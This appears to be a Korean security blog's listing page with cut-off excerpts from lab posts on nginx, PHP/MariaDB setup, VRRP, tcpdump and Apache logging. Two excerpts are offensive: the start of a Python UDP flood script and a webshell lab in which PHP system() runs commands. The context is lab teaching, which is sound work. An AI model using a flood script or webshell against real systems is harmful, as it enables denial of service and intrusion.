정보 보안 분야

실습> nginx 에서 가상호스트 설정하기 1. hosts 파일 편집 테스트이기 때문에 자신의 IP주소에 해당하는 것으로 설정한다. -- /etc/hosts -- 127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4 ::1 localhost localhost.localdomain localhost6 localhost6.localdomain6 192.168.108.102 server3.linuxmaster.co.kr 192.168.108.102 sbs.com www.sbs.com 192.168.108.102 kbs.com www.kbs.com 192.168.108.102 mbc.com www.mbc.com -- /etc/h..

미션> Nginx + PHP + MariaDB 연동 웹서버를 설치하기 1. vim 설정 nginx.conf 를 컬러로 인식하기 위해서는 파일 타입을 추가한다. # cd # yum -y install vim # alias vi=vim # echo vim=vim >> ~/.bashrc # mkdir -p ~/.vim/syntax # wget http://www.vim.org/scripts/download_script.php?src_id=19394 -O ~/.vim/syntax/nginx.vim # cat > ~/.vim/filetype.vim 님 환영합니다. 로그아웃 아이디 비밀번호 -- login.html -- # vi loginok.html -- loginok.html -- -- loginok.html ..

미션> Nginx + PHP + MariaDB 연동 설치하기 Nginx + php + php-fpm + mariadb php-fpm 통신 방법 : 소켓파일 php를 사용하기 위해서는 php-fpm 패키지를 설치한다. php-fpm은 PHP FastCGI Process Manager의 약자로 FastCGI는 CGI보다 더 빠른 처리를 말한다. Nginx + PHP 설치 후 phpinfo() 함수가 실행되서 내용이 출력되게 설정한다. -- index.php -- -- index.php -- PHP연동 후 IP주소로 직접 접속한다. http://192.168.108.102 로그인 기능 추가 - DB 의 member 테이블 login.html loginok.html logout.html 파일을 생성한다. log..

>>>>> nginx.txt

실습> 라우터 이중화 VRRP 설정하기 VRRP(Virtual Router Redundancy Protocol)는 RFC Standard 2338에 정의된 표준 프로토콜이다. HSRP는 Cisco 에서 개발되어 Cisco만 지원하지만 VRRP는 모든 Vendor에서 지원되는 IEEE에서 표준으로 제정한 Protocol 이다. VRRP는 라우터를 이중화하는 기술로 여러 대 (최소 2대 이상)의 Router를 하나의 group으로 묶어서 Client의 Gateway에 대한 IP Address를 공유하고 Priority가 높은 Router가 Master로 설정되고 Gateway로 동작하다가 Master Router에 장애가 발생하면 그 다음 Priority의 높은 값을 가진 Backup Router가 Mast..

실습> tcpdump를 이용한 패킷 분석 2 1. 공격 코드 작성 Attacker ~# vi udpflood.py #!/usr/bin/env python3 # 모듈 사용 import socket import random # 배너 print("#################") print("# UDP flooding #") print("#################") # UDP 통신을 할 수 있는 소켓을 생성한다. sock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) # 랜덤으로 숫자를 넣는다. bytes = random._urandom(1024) # IP/Port 를 입력 받는다. #ip = input('Victim IP: ') #port = int(input..

인터페이스 ens33을 지정해서 그 인터페이스에 들어온 패킷을 모니터링 한다. # tcpdump -i ens33 인터페이스에 들어온 패킷을 tcpdump.pcap 파일로 저장한다. # tcpdump -w tcpdump.pcap tcpdump.pcap 파일을 읽어서 화면에 출력한다. # tcpdump -r tcpdump.pcap 인터페이스 ens33을 지정해서 그 인터페이스에 들어온 패킷중에서 80번 포트를 모니터링한다. # tcpdump -i ens33 tcp port 80 인터페이스 ens33을 지정해서 그 인터페이스에 들어온 패킷중에서 소스 IP주소가 192.168.108.200으로 되어있는 패킷을 모니터링한다. # tcpdump -i ens33 src 192.168.108.200 인터페이스 ens3..

실습> 웹서버 파일에 백도어 system("명령어") : system()함수는 인수에 명령어를 넣으면 명령어가 실행된다. system("pwd"); -- list.html -- Attacker ~# /etc/init.d/apache2 start Starting apache2 (via systemctl): apache2.service. Attacker ~# cd /var/www/html Attacker ~# vi webshellTest.php -- webshellTest.php -- -- webshellTest.php -- http://192.168.108.200/webshellTest.php pwd /var/www/html

실습> HTTP 환경변수 로그 남기기 1. 로그 포맷 변경 %{Foobar}i : Foobar의 내용 - 서버에 요청을 할 때의 헤더에 있는 내용 # vi /etc/httpd/conf/httpd.conf : :(생략) LogFormat "%t \"%r\" \"%{Host}i\" " mylog CustomLog "logs/access_log" mylog 2. 웹서버 재시작 # httpd -t # systemctl reload httpd 3. 로그 모니터링 # tail -f /var/log/httpd/access_log 4. 웹서버 접속 브라우저에서 접속한다. http://192.168.108.101/ 5. 로그 확인 # tail -f /var/log/httpd/access_log [07/Mar/2022:2..

실습> 아파치 웹서버 로그 분석하기 /etc/httpd/conf/httpd.conf 설정파일에 로그 포맷에 대한 정보가 저장되어 있다. ServerRoot "/etc/httpd" ErrorLog : 에러 로그 지시어로 에러가 기록되는 정보를 가지고 있다. CustomLog : 접속 로그 시시어로 클라이언트가 접속하면 기록되는 정보를 가지고 있다. 상대 경로로 로그파일을 지정하면 ServerRoot 지시어의 값을 붙어서 /etc/httpd/logs/error_log 가 된다. 결국 /etc/httpd/logs/error_log 파일은 /var/log/httpd/error_log 파일이다. LogFormat 형식 : LogFormat "로그 포맷 형식" 로그포맷명 ErrorLog 형식 : ErrorLog "..